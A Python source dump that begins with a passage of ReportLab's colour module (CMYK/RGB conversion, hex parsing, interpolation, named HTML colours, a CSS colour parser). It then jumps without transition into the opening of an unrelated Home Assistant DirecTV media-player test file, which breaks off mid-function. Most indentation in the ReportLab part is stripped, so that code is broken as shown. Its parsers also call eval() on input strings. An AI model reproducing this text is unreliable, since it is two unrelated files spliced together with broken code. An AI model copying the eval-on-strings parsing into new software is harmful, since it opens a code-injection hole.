CMYKColor.__init__(self,cyan,magenta,yellow,black,spotName,density,knockout=None,alpha=alpha)
_cKwds='cyan magenta yellow black density alpha spotName'.split()
class PCMYKColorSep(PCMYKColor,CMYKColorSep):
'''special case color for making separating pdfs'''
_scale = 100.
def __init__(self, cyan=0, magenta=0, yellow=0, black=0,
spotName=None, density=100, alpha=100):
PCMYKColor.__init__(self,cyan,magenta,yellow,black,density,spotName,knockout=None,alpha=alpha)
_cKwds='cyan magenta yellow black density alpha spotName'.split()
def cmyk2rgb(cmyk,density=1):
"Convert from a CMYK color tuple to an RGB color tuple"
c,m,y,k = cmyk
# From the Adobe Postscript Ref. Manual 2nd ed.
r = 1.0 - min(1.0, c + k)
g = 1.0 - min(1.0, m + k)
b = 1.0 - min(1.0, y + k)
return (r,g,b)
def rgb2cmyk(r,g,b):
'''one way to get cmyk from rgb'''
c = 1 - r
m = 1 - g
y = 1 - b
k = min(c,m,y)
c = min(1,max(0,c-k))
m = min(1,max(0,m-k))
y = min(1,max(0,y-k))
k = min(1,max(0,k))
return (c,m,y,k)
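# Worked example (a sketch): pure red round-trips through this naive model.
#   rgb2cmyk(1, 0, 0)       returns (0, 1, 1, 0)
#   cmyk2rgb((0, 1, 1, 0))  returns (1.0, 0.0, 0.0)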
def color2bw(colorRGB):
"Transform an RGB color to a black and white equivalent."
col = colorRGB
r, g, b, a = col.red, col.green, col.blue, col.alpha
n = (r + g + b) / 3.0
bwColorRGB = Color(n, n, n, a)
return bwColorRGB
def HexColor(val, htmlOnly=False, alpha=False):
"""This function converts a hex string, or an actual integer number,
into the corresponding color. E.g., in "#AABBCC" or 0xAABBCC,
AA is the red, BB is the green, and CC is the blue (00-FF).
An alpha value can also be given in the form #AABBCCDD or 0xAABBCCDD where
DD is the alpha value.
For completeness I assume that #aabbcc or 0xaabbcc are hex numbers
otherwise a pure integer is converted as decimal rgb. If htmlOnly is true,
only the #aabbcc form is allowed.
>>> HexColor('#ffffff')
Color(1,1,1,1)
>>> HexColor('#FFFFFF')
Color(1,1,1,1)
>>> HexColor('0xffffff')
Color(1,1,1,1)
>>> HexColor('16777215')
Color(1,1,1,1)
An '0x' or '#' prefix is required for hex (as opposed to decimal):
>>> HexColor('ffffff')
Traceback (most recent call last):
ValueError: invalid literal for int() with base 10: 'ffffff'
>>> HexColor('#FFFFFF', htmlOnly=True)
Color(1,1,1,1)
>>> HexColor('0xffffff', htmlOnly=True)
Traceback (most recent call last):
ValueError: not a hex string
>>> HexColor('16777215', htmlOnly=True)
Traceback (most recent call last):
ValueError: not a hex string
""" #" for emacs
if isinstance(val,basestring):
b = 10
if val[:1] == '#':
val = val[1:]
b = 16
if len(val) == 8:
alpha = True
else:
if htmlOnly:
raise ValueError('not a hex string')
if val[:2].lower() == '0x':
b = 16
val = val[2:]
if len(val) == 8:
alpha = True
val = int(val,b)
if alpha:
        return Color(((val>>24)&0xFF)/255.0,((val>>16)&0xFF)/255.0,((val>>8)&0xFF)/255.0,(val&0xFF)/255.0)
return Color(((val>>16)&0xFF)/255.0,((val>>8)&0xFF)/255.0,(val&0xFF)/255.0)
def linearlyInterpolatedColor(c0, c1, x0, x1, x):
"""
Linearly interpolates colors. Can handle RGB, CMYK and PCMYK
colors - give ValueError if colours aren't the same.
Doesn't currently handle 'Spot Color Interpolation'.
"""
if c0.__class__ != c1.__class__:
raise ValueError("Color classes must be the same for interpolation!\nGot %r and %r'"%(c0,c1))
if x1<x0:
x0,x1,c0,c1 = x1,x0,c1,c0 # normalized so x1>x0
if x<x0-1e-8 or x>x1+1e-8: # fudge factor for numerical problems
raise ValueError, "Can't interpolate: x=%f is not between %f and %f!" % (x,x0,x1)
if x<=x0:
return c0
elif x>=x1:
return c1
cname = c0.__class__.__name__
dx = float(x1-x0)
x = x-x0
if cname == 'Color': # RGB
r = c0.red+x*(c1.red - c0.red)/dx
g = c0.green+x*(c1.green- c0.green)/dx
b = c0.blue+x*(c1.blue - c0.blue)/dx
a = c0.alpha+x*(c1.alpha - c0.alpha)/dx
return Color(r,g,b,alpha=a)
elif cname == 'CMYKColor':
if cmykDistance(c0,c1)<1e-8:
#colors same do density and preserve spotName if any
assert c0.spotName == c1.spotName, "Identical cmyk, but different spotName"
c = c0.cyan
m = c0.magenta
y = c0.yellow
k = c0.black
d = c0.density+x*(c1.density - c0.density)/dx
a = c0.alpha+x*(c1.alpha - c0.alpha)/dx
return CMYKColor(c,m,y,k, density=d, spotName=c0.spotName, alpha=a)
elif cmykDistance(c0,_CMYK_white)<1e-8:
#special c0 is white
c = c1.cyan
m = c1.magenta
y = c1.yellow
k = c1.black
d = x*c1.density/dx
a = x*c1.alpha/dx
return CMYKColor(c,m,y,k, density=d, spotName=c1.spotName, alpha=a)
elif cmykDistance(c1,_CMYK_white)<1e-8:
#special c1 is white
c = c0.cyan
m = c0.magenta
y = c0.yellow
k = c0.black
            d = c0.density*(1-x/dx)
            a = c0.alpha*(1-x/dx)
            return CMYKColor(c,m,y,k, density=d, spotName=c0.spotName, alpha=a)
else:
c = c0.cyan+x*(c1.cyan - c0.cyan)/dx
m = c0.magenta+x*(c1.magenta - c0.magenta)/dx
y = c0.yellow+x*(c1.yellow - c0.yellow)/dx
k = c0.black+x*(c1.black - c0.black)/dx
d = c0.density+x*(c1.density - c0.density)/dx
a = c0.alpha+x*(c1.alpha - c0.alpha)/dx
return CMYKColor(c,m,y,k, density=d, alpha=a)
elif cname == 'PCMYKColor':
if cmykDistance(c0,c1)<1e-8:
#colors same do density and preserve spotName if any
assert c0.spotName == c1.spotName, "Identical cmyk, but different spotName"
c = c0.cyan
m = c0.magenta
y = c0.yellow
k = c0.black
d = c0.density+x*(c1.density - c0.density)/dx
a = c0.alpha+x*(c1.alpha - c0.alpha)/dx
return PCMYKColor(c*100,m*100,y*100,k*100, density=d*100,
spotName=c0.spotName, alpha=100*a)
elif cmykDistance(c0,_CMYK_white)<1e-8:
#special c0 is white
c = c1.cyan
m = c1.magenta
y = c1.yellow
k = c1.black
d = x*c1.density/dx
a = x*c1.alpha/dx
return PCMYKColor(c*100,m*100,y*100,k*100, density=d*100,
spotName=c1.spotName, alpha=a*100)
elif cmykDistance(c1,_CMYK_white)<1e-8:
#special c1 is white
c = c0.cyan
m = c0.magenta
y = c0.yellow
k = c0.black
            d = c0.density*(1-x/dx)
a = c0.alpha*(1-x/dx)
return PCMYKColor(c*100,m*100,y*100,k*100, density=d*100,
spotName=c0.spotName, alpha=a*100)
else:
c = c0.cyan+x*(c1.cyan - c0.cyan)/dx
m = c0.magenta+x*(c1.magenta - c0.magenta)/dx
y = c0.yellow+x*(c1.yellow - c0.yellow)/dx
k = c0.black+x*(c1.black - c0.black)/dx
d = c0.density+x*(c1.density - c0.density)/dx
a = c0.alpha+x*(c1.alpha - c0.alpha)/dx
return PCMYKColor(c*100,m*100,y*100,k*100, density=d*100, alpha=a*100)
else:
raise ValueError, "Can't interpolate: Unknown color class %s!" % cname
def obj_R_G_B(c):
'''attempt to convert an object to (red,green,blue)'''
if isinstance(c,Color):
return c.red,c.green,c.blue
elif isinstance(c,(tuple,list)):
if len(c)==3:
return tuple(c)
elif len(c)==4:
return toColor(c).rgb()
else:
raise ValueError('obj_R_G_B(%r) bad argument' % (c))
# special case -- indicates no drawing should be done
# this is a hangover from PIDDLE - suggest we ditch it since it is not used anywhere
transparent = Color(0,0,0,alpha=0)
_CMYK_white=CMYKColor(0,0,0,0)
_PCMYK_white=PCMYKColor(0,0,0,0)
_CMYK_black=CMYKColor(0,0,0,1)
_PCMYK_black=PCMYKColor(0,0,0,100)
# Special colors
ReportLabBlueOLD = HexColor(0x4e5688)
ReportLabBlue = HexColor(0x00337f)
ReportLabBluePCMYK = PCMYKColor(100,65,0,30,spotName='Pantone 288U')
ReportLabLightBlue = HexColor(0xb7b9d3)
ReportLabFidBlue=HexColor(0x3366cc)
ReportLabFidRed=HexColor(0xcc0033)
ReportLabGreen = HexColor(0x336600)
ReportLabLightGreen = HexColor(0x339933)
# color constants -- mostly from HTML standard
aliceblue = HexColor(0xF0F8FF)
antiquewhite = HexColor(0xFAEBD7)
aqua = HexColor(0x00FFFF)
aquamarine = HexColor(0x7FFFD4)
azure = HexColor(0xF0FFFF)
beige = HexColor(0xF5F5DC)
bisque = HexColor(0xFFE4C4)
black = HexColor(0x000000)
blanchedalmond = HexColor(0xFFEBCD)
blue = HexColor(0x0000FF)
blueviolet = HexColor(0x8A2BE2)
brown = HexColor(0xA52A2A)
burlywood = HexColor(0xDEB887)
cadetblue = HexColor(0x5F9EA0)
chartreuse = HexColor(0x7FFF00)
chocolate = HexColor(0xD2691E)
coral = HexColor(0xFF7F50)
cornflowerblue = cornflower = HexColor(0x6495ED)
cornsilk = HexColor(0xFFF8DC)
crimson = HexColor(0xDC143C)
cyan = HexColor(0x00FFFF)
darkblue = HexColor(0x00008B)
darkcyan = HexColor(0x008B8B)
darkgoldenrod = HexColor(0xB8860B)
darkgray = HexColor(0xA9A9A9)
darkgrey = darkgray
darkgreen = HexColor(0x006400)
darkkhaki = HexColor(0xBDB76B)
darkmagenta = HexColor(0x8B008B)
darkolivegreen = HexColor(0x556B2F)
darkorange = HexColor(0xFF8C00)
darkorchid = HexColor(0x9932CC)
darkred = HexColor(0x8B0000)
darksalmon = HexColor(0xE9967A)
darkseagreen = HexColor(0x8FBC8B)
darkslateblue = HexColor(0x483D8B)
darkslategray = HexColor(0x2F4F4F)
darkslategrey = darkslategray
darkturquoise = HexColor(0x00CED1)
darkviolet = HexColor(0x9400D3)
deeppink = HexColor(0xFF1493)
deepskyblue = HexColor(0x00BFFF)
dimgray = HexColor(0x696969)
dimgrey = dimgray
dodgerblue = HexColor(0x1E90FF)
firebrick = HexColor(0xB22222)
floralwhite = HexColor(0xFFFAF0)
forestgreen = HexColor(0x228B22)
fuchsia = HexColor(0xFF00FF)
gainsboro = HexColor(0xDCDCDC)
ghostwhite = HexColor(0xF8F8FF)
gold = HexColor(0xFFD700)
goldenrod = HexColor(0xDAA520)
gray = HexColor(0x808080)
grey = gray
green = HexColor(0x008000)
greenyellow = HexColor(0xADFF2F)
honeydew = HexColor(0xF0FFF0)
hotpink = HexColor(0xFF69B4)
indianred = HexColor(0xCD5C5C)
indigo = HexColor(0x4B0082)
ivory = HexColor(0xFFFFF0)
khaki = HexColor(0xF0E68C)
lavender = HexColor(0xE6E6FA)
lavenderblush = HexColor(0xFFF0F5)
lawngreen = HexColor(0x7CFC00)
lemonchiffon = HexColor(0xFFFACD)
lightblue = HexColor(0xADD8E6)
lightcoral = HexColor(0xF08080)
lightcyan = HexColor(0xE0FFFF)
lightgoldenrodyellow = HexColor(0xFAFAD2)
lightgreen = HexColor(0x90EE90)
lightgrey = HexColor(0xD3D3D3)
lightpink = HexColor(0xFFB6C1)
lightsalmon = HexColor(0xFFA07A)
lightseagreen = HexColor(0x20B2AA)
lightskyblue = HexColor(0x87CEFA)
lightslategray = HexColor(0x778899)
lightslategrey = lightslategray
lightsteelblue = HexColor(0xB0C4DE)
lightyellow = HexColor(0xFFFFE0)
lime = HexColor(0x00FF00)
limegreen = HexColor(0x32CD32)
linen = HexColor(0xFAF0E6)
magenta = HexColor(0xFF00FF)
maroon = HexColor(0x800000)
mediumaquamarine = HexColor(0x66CDAA)
mediumblue = HexColor(0x0000CD)
mediumorchid = HexColor(0xBA55D3)
mediumpurple = HexColor(0x9370DB)
mediumseagreen = HexColor(0x3CB371)
mediumslateblue = HexColor(0x7B68EE)
mediumspringgreen = HexColor(0x00FA9A)
mediumturquoise = HexColor(0x48D1CC)
mediumvioletred = HexColor(0xC71585)
midnightblue = HexColor(0x191970)
mintcream = HexColor(0xF5FFFA)
mistyrose = HexColor(0xFFE4E1)
moccasin = HexColor(0xFFE4B5)
navajowhite = HexColor(0xFFDEAD)
navy = HexColor(0x000080)
oldlace = HexColor(0xFDF5E6)
olive = HexColor(0x808000)
olivedrab = HexColor(0x6B8E23)
orange = HexColor(0xFFA500)
orangered = HexColor(0xFF4500)
orchid = HexColor(0xDA70D6)
palegoldenrod = HexColor(0xEEE8AA)
palegreen = HexColor(0x98FB98)
paleturquoise = HexColor(0xAFEEEE)
palevioletred = HexColor(0xDB7093)
papayawhip = HexColor(0xFFEFD5)
peachpuff = HexColor(0xFFDAB9)
peru = HexColor(0xCD853F)
pink = HexColor(0xFFC0CB)
plum = HexColor(0xDDA0DD)
powderblue = HexColor(0xB0E0E6)
purple = HexColor(0x800080)
red = HexColor(0xFF0000)
rosybrown = HexColor(0xBC8F8F)
royalblue = HexColor(0x4169E1)
saddlebrown = HexColor(0x8B4513)
salmon = HexColor(0xFA8072)
sandybrown = HexColor(0xF4A460)
seagreen = HexColor(0x2E8B57)
seashell = HexColor(0xFFF5EE)
sienna = HexColor(0xA0522D)
silver = HexColor(0xC0C0C0)
skyblue = HexColor(0x87CEEB)
slateblue = HexColor(0x6A5ACD)
slategray = HexColor(0x708090)
slategrey = slategray
snow = HexColor(0xFFFAFA)
springgreen = HexColor(0x00FF7F)
steelblue = HexColor(0x4682B4)
tan = HexColor(0xD2B48C)
teal = HexColor(0x008080)
thistle = HexColor(0xD8BFD8)
tomato = HexColor(0xFF6347)
turquoise = HexColor(0x40E0D0)
violet = HexColor(0xEE82EE)
wheat = HexColor(0xF5DEB3)
white = HexColor(0xFFFFFF)
whitesmoke = HexColor(0xF5F5F5)
yellow = HexColor(0xFFFF00)
yellowgreen = HexColor(0x9ACD32)
fidblue=HexColor(0x3366cc)
fidred=HexColor(0xcc0033)
fidlightblue=HexColor("#d6e0f5")
ColorType=type(black)
################################################################
#
# Helper functions for dealing with colors. These tell you
# which are predefined, so you can print color charts;
# and can give the nearest match to an arbitrary color object
#
#################################################################
def colorDistance(col1, col2):
"""Returns a number between 0 and root(3) stating how similar
    two colours are - distance in r,g,b space. Only used to find
names for things."""
return math.sqrt(
(col1.red - col2.red)**2 +
(col1.green - col2.green)**2 +
(col1.blue - col2.blue)**2
)
def cmykDistance(col1, col2):
"""Returns a number between 0 and root(4) stating how similar
two colours are - distance in r,g,b, space. Only used to find
names for things."""
return math.sqrt(
(col1.cyan - col2.cyan)**2 +
(col1.magenta - col2.magenta)**2 +
(col1.yellow - col2.yellow)**2 +
(col1.black - col2.black)**2
)
_namedColors = None
def getAllNamedColors():
#returns a dictionary of all the named ones in the module
# uses a singleton for efficiency
global _namedColors
if _namedColors is not None: return _namedColors
import colors
_namedColors = {}
for (name, value) in colors.__dict__.items():
if isinstance(value, Color):
_namedColors[name] = value
return _namedColors
def describe(aColor,mode=0):
    '''finds nearest colour match to aColor.
    mode=0 print a string description
    mode=1 return a string description
    mode=2 return (colorName, distance)
    '''
namedColors = getAllNamedColors()
closest = (10, None, None) #big number, name, color
for (name, color) in namedColors.items():
distance = colorDistance(aColor, color)
if distance < closest[0]:
closest = (distance, name, color)
if mode<=1:
s = 'best match is %s, distance %0.4f' % (closest[1], closest[0])
if mode==0: print s
else: return s
elif mode==2:
return (closest[1], closest[0])
else:
raise ValueError, "Illegal value for mode "+str(mode)
def hue2rgb(m1, m2, h):
if h<0: h += 1
if h>1: h -= 1
if h*6<1: return m1+(m2-m1)*h*6
if h*2<1: return m2
if h*3<2: return m1+(m2-m1)*(4-6*h)
return m1
def hsl2rgb(h, s, l):
if l<=0.5:
m2 = l*(s+1)
else:
m2 = l+s-l*s
m1 = l*2-m2
return hue2rgb(m1, m2, h+1./3),hue2rgb(m1, m2, h),hue2rgb(m1, m2, h-1./3)
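#Illustrative sketch (not part of the original module): the CSS hsl()
#primaries come out of hsl2rgb as expected at full saturation, 50% lightness.
def _hsl_example():
    r, g, b = hsl2rgb(0, 1, 0.5)  #hue 0 -> red
    assert (round(r, 6), round(g, 6), round(b, 6)) == (1.0, 0.0, 0.0)
    r, g, b = hsl2rgb(1./3, 1, 0.5)  #hue 120/360 -> green
    assert (round(r, 6), round(g, 6), round(b, 6)) == (0.0, 1.0, 0.0)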
class cssParse:
def pcVal(self,v):
v = v.strip()
try:
c=eval(v[:-1])
if not isinstance(c,(float,int)): raise ValueError
c=min(100,max(0,c))/100.
except:
raise ValueError('bad percentage argument value %r in css color %r' % (v,self.s))
return c
def rgbPcVal(self,v):
return int(self.pcVal(v)*255+0.5)/255.
def rgbVal(self,v):
v = v.strip()
try:
c=eval(v[:])
if not isinstance(c,int): raise ValueError
return int(min(255,max(0,c)))/255.
except:
raise ValueError('bad argument value %r in css color %r' % (v,self.s))
def hueVal(self,v):
v = v.strip()
try:
c=eval(v[:])
if not isinstance(c,(int,float)): raise ValueError
return ((c%360+360)%360)/360.
except:
raise ValueError('bad hue argument value %r in css color %r' % (v,self.s))
def alphaVal(self,v,c=1,n='alpha'):
try:
a = eval(v.strip())
if not isinstance(a,(int,float)): raise ValueError
return min(c,max(0,a))
except:
raise ValueError('bad %s argument value %r in css color %r' % (n,v,self.s))
def __call__(self,s):
s = s.strip()
hsl = s.startswith('hsl')
rgb = s.startswith('rgb')
cmyk = s.startswith('cmyk')
c = 1
if hsl: n = 3
if rgb: n = 3
if cmyk:
n = 4
else:
cmyk = s.startswith('pcmyk')
if cmyk:
n = 5
c = 100
if not (rgb or hsl or cmyk): return None
self.s = s
n = s[n:]
ha = n.startswith('a')
n = n[(ha and 1 or 0):].strip()
if not n.startswith('(') or not n.endswith(')'):
raise ValueError('improperly formatted css style color %r' % s)
n = n[1:-1].split(',') #strip parens and split on comma
a = len(n)
b = cmyk and 4 or 3
if ha and a!=(b+1) or not ha and a!=b:
raise ValueError('css color %r has wrong number of components' % s)
if ha:
n,a = n[:b],self.alphaVal(n[b],c)
else:
a = c
if cmyk:
C = self.alphaVal(n[0],c,'cyan')
M = self.alphaVal(n[1],c,'magenta')
Y = self.alphaVal(n[2],c,'yellow')
K = self.alphaVal(n[3],c,'black')
return (c>1 and PCMYKColor or CMYKColor)(C,M,Y,K,alpha=a)
else:
if hsl:
R,G,B= hsl2rgb(self.hueVal(n[0]),self.pcVal(n[1]),self.pcVal(n[2]))
else:
R,G,B = map('%' in n[0] and self.rgbPcVal or self.rgbVal,n)
return Color(R,G,B,a)
cssParse=cssParse()
class toColor:
def __init__(self):
self.extraColorsNS = {} #used for overriding/adding to existing color names
#make case insensitive if that's your wish
def setExtraColorsNameSpace(self,NS):
self.extraColorsNS = NS
def __call__(self,arg,default=None):
'''try to map an arbitrary arg to a color instance
>>> toColor('rgb(128,0,0)')==toColor('rgb(50%,0%,0%)')
True
>>> toColor('rgb(50%,0%,0%)')!=Color(0.5,0,0,1)
True
>>> toColor('hsl(0,100%,50%)')==toColor('rgb(255,0,0)')
True
>>> toColor('hsl(-120,100%,50%)')==toColor('rgb(0,0,255)')
True
>>> toColor('hsl(120,100%,50%)')==toColor('rgb(0,255,0)')
True
>>> toColor('rgba(255,0,0,0.5)')==Color(1,0,0,0.5)
True
>>> toColor('cmyk(1,0,0,0)')==CMYKColor(1,0,0,0)
True
>>> toColor('pcmyk(100,0,0,0)')==PCMYKColor(100,0,0,0)
True
>>> toColor('cmyka(1,0,0,0,0.5)')==CMYKColor(1,0,0,0,alpha=0.5)
True
>>> toColor('pcmyka(100,0,0,0,0.5)')==PCMYKColor(100,0,0,0,alpha=0.5)
True
'''
if isinstance(arg,Color): return arg
if isinstance(arg,(tuple,list)):
assert 3<=len(arg)<=4, 'Can only convert 3 and 4 sequences to color'
assert 0<=min(arg) and max(arg)<=1
return len(arg)==3 and Color(arg[0],arg[1],arg[2]) or CMYKColor(arg[0],arg[1],arg[2],arg[3])
elif isinstance(arg,basestring):
C = cssParse(arg)
if C: return C
if arg in self.extraColorsNS: return self.extraColorsNS[arg]
C = getAllNamedColors()
s = arg.lower()
if s in C: return C[s]
try:
return toColor(eval(arg))
except:
pass
try:
return HexColor(arg)
except:
if default is None:
raise ValueError('Invalid color value %r' % arg)
return default
toColor = toColor()
def toColorOrNone(arg,default=None):
'''as above but allows None as a legal value'''
if arg is None:
return None
else:
return toColor(arg, default)
def setColors(**kw):
UNDEF = []
progress = 1
assigned = {}
while kw and progress:
progress = 0
for k, v in kw.items():
if isinstance(v,(tuple,list)):
c = map(lambda x,UNDEF=UNDEF: toColor(x,UNDEF),v)
if isinstance(v,tuple): c = tuple(c)
ok = UNDEF not in c
else:
c = toColor(v,UNDEF)
ok = c is not UNDEF
if ok:
assigned[k] = c
del kw[k]
progress = 1
if kw: raise ValueError("Can't convert\n%s" % str(kw))
getAllNamedColors()
for k, c in assigned.items():
globals()[k] = c
if isinstance(c,Color): _namedColors[k] = c
def Whiter(c,f):
    '''given a color combine with white as c*f + w*(1-f) 0<=f<=1'''
c = toColor(c)
if isinstance(c,CMYKColorSep):
c = c.clone()
if isinstance(c,PCMYKColorSep):
c.__class__ = PCMYKColor
else:
c.__class__ = CMYKColor
if isinstance(c,PCMYKColor):
w = _PCMYK_white
elif isinstance(c,CMYKColor): w = _CMYK_white
else: w = white
return linearlyInterpolatedColor(w, c, 0, 1, f)
def Blacker(c,f):
'''given a color combine with black as c*f+b*(1-f) 0<=f<=1'''
c = toColor(c)
if isinstance(c,CMYKColorSep):
c = c.clone()
if isinstance(c,PCMYKColorSep):
c.__class__ = PCMYKColor
else:
c.__class__ = CMYKColor
if isinstance(c,PCMYKColor):
b = _PCMYK_black
elif isinstance(c,CMYKColor): b = _CMYK_black
else: b = black
return linearlyInterpolatedColor(b, c, 0, 1, f)
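#Illustrative sketch (not part of the original module): Whiter and Blacker
#are thin wrappers over linearlyInterpolatedColor; f=1 keeps the colour
#unchanged, f=0 yields pure white (resp. black) in the colour's own model.
def _tint_example():
    half_tint = Whiter(red, 0.5)    #midway between red and white
    half_shade = Blacker(red, 0.5)  #midway between red and black
    return half_tint, half_shade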
def fade(aSpotColor, percentages):
"""Waters down spot colors and returns a list of new ones
e.g fade(myColor, [100,80,60,40,20]) returns a list of five colors
"""
out = []
for percent in percentages:
frac = percent * 0.01 #assume they give us numbers from 0 to 100
newCyan = frac * aSpotColor.cyan
newMagenta = frac * aSpotColor.magenta
newYellow = frac * aSpotColor.yellow
newBlack = frac * aSpotColor.black
newDensity = frac * aSpotColor.density
newSpot = CMYKColor( newCyan, newMagenta, newYellow, newBlack,
spotName = aSpotColor.spotName,
density = newDensity)
out.append(newSpot)
return out
def _enforceError(kind,c,tc):
if isinstance(tc,Color):
xtra = tc._lookupName()
xtra = xtra and '(%s)'%xtra or ''
else:
xtra = ''
raise ValueError('Non %s color %r%s' % (kind,c,xtra))
def _enforceSEP(c):
'''pure separating colors only, this makes black a problem'''
tc = toColor(c)
if not isinstance(tc,CMYKColorSep):
_enforceError('separating',c,tc)
return tc
def _enforceSEP_BLACK(c):
'''separating + blacks only'''
tc = toColor(c)
if not isinstance(tc,CMYKColorSep):
if isinstance(tc,Color) and tc.red==tc.blue==tc.green: #ahahahah it's a grey
tc = _CMYK_black.clone(density=1-tc.red)
elif not (isinstance(tc,CMYKColor) and tc.cyan==tc.magenta==tc.yellow==0): #ie some shade of grey
_enforceError('separating or black',c,tc)
return tc
def _enforceSEP_CMYK(c):
'''separating or cmyk only'''
tc = toColor(c)
if not isinstance(tc,CMYKColorSep):
if isinstance(tc,Color) and tc.red==tc.blue==tc.green: #ahahahah it's a grey
tc = _CMYK_black.clone(density=1-tc.red)
elif not isinstance(tc,CMYKColor):
_enforceError('separating or CMYK',c,tc)
return tc
def _enforceCMYK(c):
'''cmyk outputs only (rgb greys converted)'''
tc = toColor(c)
if not isinstance(tc,CMYKColor):
if isinstance(tc,Color) and tc.red==tc.blue==tc.green: #ahahahah it's a grey
tc = _CMYK_black.clone(black=1-tc.red,alpha=tc.alpha)
else:
_enforceError('CMYK',c,tc)
elif isinstance(tc,CMYKColorSep):
tc = tc.clone()
tc.__class__ = CMYKColor
return tc
def _enforceRGB(c):
tc = toColor(c)
if isinstance(tc,CMYKColor):
if tc.cyan==tc.magenta==tc.yellow==0: #ahahahah it's grey
v = 1-tc.black*tc.density
tc = Color(v,v,v,alpha=tc.alpha)
else:
_enforceError('RGB',c,tc)
return tc
def _chooseEnforceColorSpace(enforceColorSpace):
if enforceColorSpace is not None and not callable(enforceColorSpace):
if isinstance(enforceColorSpace,basestring): enforceColorSpace=enforceColorSpace.upper()
if enforceColorSpace=='CMYK':
enforceColorSpace = _enforceCMYK
elif enforceColorSpace=='RGB':
enforceColorSpace = _enforceRGB
elif enforceColorSpace=='SEP':
enforceColorSpace = _enforceSEP
elif enforceColorSpace=='SEP_BLACK':
enforceColorSpace = _enforceSEP_BLACK
elif enforceColorSpace=='SEP_CMYK':
enforceColorSpace = _enforceSEP_CMYK
else:
raise ValueError('Invalid value for Canvas argument enforceColorSpace=%r' % enforceColorSpace)
return enforceColorSpace
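#Illustrative sketch (not part of the original module): resolving a Canvas
#enforceColorSpace argument to one of the _enforce* callables above and
#coercing an RGB grey into the CMYK model (per _enforceCMYK's docstring).
def _enforce_example():
    enforce = _chooseEnforceColorSpace('cmyk')  #case-insensitive
    grey = enforce(Color(0.5, 0.5, 0.5))        #rgb grey -> CMYK black tint
    assert isinstance(grey, CMYKColor)
    return grey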
if __name__ == "__main__":
import doctest
doctest.testmod()
"""The tests for the DirecTV Media player platform."""
from __future__ import annotations
from datetime import datetime, timedelta
from unittest.mock import patch
from pytest import fixture
from homeassistant.components.directv.media_player import (
ATTR_MEDIA_CURRENTLY_RECORDING,
ATTR_MEDIA_RATING,
ATTR_MEDIA_RECORDED,
ATTR_MEDIA_START_TIME,
)
from homeassistant.components.media_player import DEVICE_CLASS_RECEIVER
from homeassistant.components.media_player.const import (
ATTR_INPUT_SOURCE,
ATTR_MEDIA_ALBUM_NAME,
ATTR_MEDIA_ARTIST,
ATTR_MEDIA_CHANNEL,
ATTR_MEDIA_CONTENT_ID,
ATTR_MEDIA_CONTENT_TYPE,
ATTR_MEDIA_DURATION,
ATTR_MEDIA_ENQUEUE,
ATTR_MEDIA_POSITION,
ATTR_MEDIA_POSITION_UPDATED_AT,
ATTR_MEDIA_SERIES_TITLE,
ATTR_MEDIA_TITLE,
DOMAIN as MP_DOMAIN,
MEDIA_TYPE_MOVIE,
MEDIA_TYPE_MUSIC,
MEDIA_TYPE_TVSHOW,
SERVICE_PLAY_MEDIA,
SUPPORT_NEXT_TRACK,
SUPPORT_PAUSE,
SUPPORT_PLAY,
SUPPORT_PLAY_MEDIA,
SUPPORT_PREVIOUS_TRACK,
SUPPORT_STOP,
SUPPORT_TURN_OFF,
SUPPORT_TURN_ON,
)
from homeassistant.const import (
ATTR_ENTITY_ID,
SERVICE_MEDIA_NEXT_TRACK,
SERVICE_MEDIA_PAUSE,
SERVICE_MEDIA_PLAY,
SERVICE_MEDIA_PREVIOUS_TRACK,
SERVICE_MEDIA_STOP,
SERVICE_TURN_OFF,
SERVICE_TURN_ON,
STATE_OFF,
STATE_PAUSED,
STATE_PLAYING,
STATE_UNAVAILABLE,
)
from homeassistant.helpers import entity_registry as er
from homeassistant.helpers.typing import HomeAssistantType
from homeassistant.util import dt as dt_util
from tests.components.directv import setup_integration
from tests.test_util.aiohttp import AiohttpClientMocker
ATTR_UNIQUE_ID = "unique_id"
CLIENT_ENTITY_ID = f"{MP_DOMAIN}.client"
MAIN_ENTITY_ID = f"{MP_DOMAIN}.host"
MUSIC_ENTITY_ID = f"{MP_DOMAIN}.music_client"
RESTRICTED_ENTITY_ID = f"{MP_DOMAIN}.restricted_client"
STANDBY_ENTITY_ID = f"{MP_DOMAIN}.standby_client"
UNAVAILABLE_ENTITY_ID = f"{MP_DOMAIN}.unavailable_client"
# pylint: disable=redefined-outer-name
@fixture
def mock_now() -> datetime:
"""Fixture for dtutil.now."""
return dt_util.utcnow()
async def async_turn_on(hass: HomeAssistantType, entity_id: str | None = None) -> None:
"""Turn on specified media player or all."""
data = {ATTR_ENTITY_ID: entity_id} if entity_id else {}
await hass.services.async_call(MP_DOMAIN, SERVICE_TURN_ON, data)
async def async_turn_off(hass: HomeAssistantType, entity_id: str | None = None) -> None:
"""Turn off specified media player or all."""
data = {ATTR_ENTITY_ID: entity_id} if entity_id else {}
await hass.services.async_call(MP_DOMAIN, SERVICE_TURN_OFF, data)
async def async_media_pause(
hass: HomeAssistantType, entity_id: str | None = None
) -> None:
"""Send the media player the command for pause."""
data = {ATTR_ENTITY_ID: entity_id} if entity_id else {}
await hass.services.async_call(MP_DOMAIN, SERVICE_MEDIA_PAUSE, data)
async def async_media_play(
hass: HomeAssistantType, entity_id: str | None = None
) -> None:
"""Send the media player the command for play/pause."""
data = {ATTR_ENTITY_ID: entity_id} if entity_id else {}
await hass.services.async_call(MP_DOMAIN, SERVICE_MEDIA_PLAY, data)
async def async_media_stop(
hass: HomeAssistantType, entity_id: str | None = None
) -> None:
"""Send the media player the command for stop."""
data = {ATTR_ENTITY_ID: entity_id} if entity_id else {}
await hass.services.async_call(MP_DOMAIN, SERVICE_MEDIA_STOP, data)
async def async_media_next_track(
hass: HomeAssistantType, entity_id: str | None = None
) -> None:
"""Send the media player the command for next track."""
data = {ATTR_ENTITY_ID: entity_id} if entity_id else {}
await hass.services.async_call(MP_DOMAIN, SERVICE_MEDIA_NEXT_TRACK, data)
async def async_media_previous_track(
hass: HomeAssistantType, entity_id: str | None = None
) -> None:
"""Send the media player the command for prev track."""
data = {ATTR_ENTITY_ID: entity_id} if entity_id else {}
await hass.services.async_call(MP_DOMAIN, SERVICE_MEDIA_PREVIOUS_TRACK, data)
async def async_play_media(
hass: HomeAssistantType,
media_type: str,
media_id: str,
entity_id: str | None = None,
enqueue: str | None = None,
) -> None:
"""Send the media player the command for playing media."""
data = {ATTR_MEDIA_CONTENT_TYPE: media_type, ATTR_MEDIA_CONTENT_ID: media_id}
if entity_id:
data[ATTR_ENTITY_ID] = entity_id
if enqueue:
